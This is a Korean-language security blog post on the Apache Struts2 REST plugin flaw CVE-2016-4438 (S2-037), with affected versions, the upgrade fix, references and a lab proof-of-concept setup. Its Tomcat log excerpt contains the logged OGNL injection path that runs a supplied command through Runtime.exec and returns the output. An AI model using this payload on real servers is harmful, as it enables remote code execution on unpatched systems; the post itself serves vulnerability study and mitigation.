[Apache Struts] Apache Struts2 취약점 CVE-2016-4438 (S2-037) 개요 및 실습

Apache Struts2 취약점 CVE-2016-4438 (S2-037) 개요 및 실습

 

1. 개요

- REST Plugin 사용 시 원격 공격자가 제작된 표현식을 통해 임의의 코드 실행 가능

2. 영향받는 버전

- Apache Struts 2.3.20 ~ 2.3.28.1 (REST Plugin 사용 시 발생)

3. 릴리즈 일자

2016/05/02

4. 대응방안

- Apache Struts 버전 2.3.29로 업그레이드

- Apache Struts 2.3.29로 업그레이드 시 OGNL 표현식의 호환성 문제 발생 가능함

5. 참고자료

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4438

https://nvd.nist.gov/vuln/detail/CVE-2016-4438

https://cwiki.apache.org/confluence/display/WW/S2-037

6. POC(Proof Of Concept)

 

1) Victim 환경

- Windows 10 Pro

- Java 1.7.8_80

- Apache Tomcat 7.0.54

- Apache Struts 2.3.28

2) Attacker 환경

- CentOS 6 x64

3) 취약점 Scanning

4) 취약점 공격(exploit)

5) catalina.out log

1월 11, 2018 2:26:01 오후 org.apache.struts2.rest.RestActionInvocation error 심각: Exception processing the result. java.lang.IllegalStateException: getWriter() has already been called for this response         at org.apache.catalina.connector.Response.getOutputStream(Response.java:602)         at org.apache.catalina.connector.ResponseFacade.getOutputStream(ResponseFacade.java:196)         at org.apache.struts2.rest.DefaultContentTypeHandlerManager.handleResult(DefaultContentTypeHandlerManager.java:187)         at org.apache.struts2.rest.RestActionInvocation.executeResult(RestActionInvocation.java:232)         at org.apache.struts2.rest.RestActionInvocation.processResult(RestActionInvocation.java:197)         at org.apache.struts2.rest.RestActionInvocation.invoke(RestActionInvocation.java:145)         at com.opensymphony.xwork2.DefaultActionProxy.execute(DefaultActionProxy.java:147)         at org.apache.struts2.dispatcher.Dispatcher.serviceAction(Dispatcher.java:567)         at org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction(ExecuteOperations.java:81)         at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:99)         at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)         at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)         at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)         at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)         at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)         at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)         at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)         at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)         at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)         at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)         at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)         at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)         at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)         at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)         at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)         at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)         at java.lang.Thread.run(Thread.java:745)   1월 11, 2018 2:26:01 오후 org.apache.struts2.rest.RestActionInvocation info 정보: Executed action [/orders!(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString!json!200] took 135 ms (execution: 49 ms, result: 86 ms)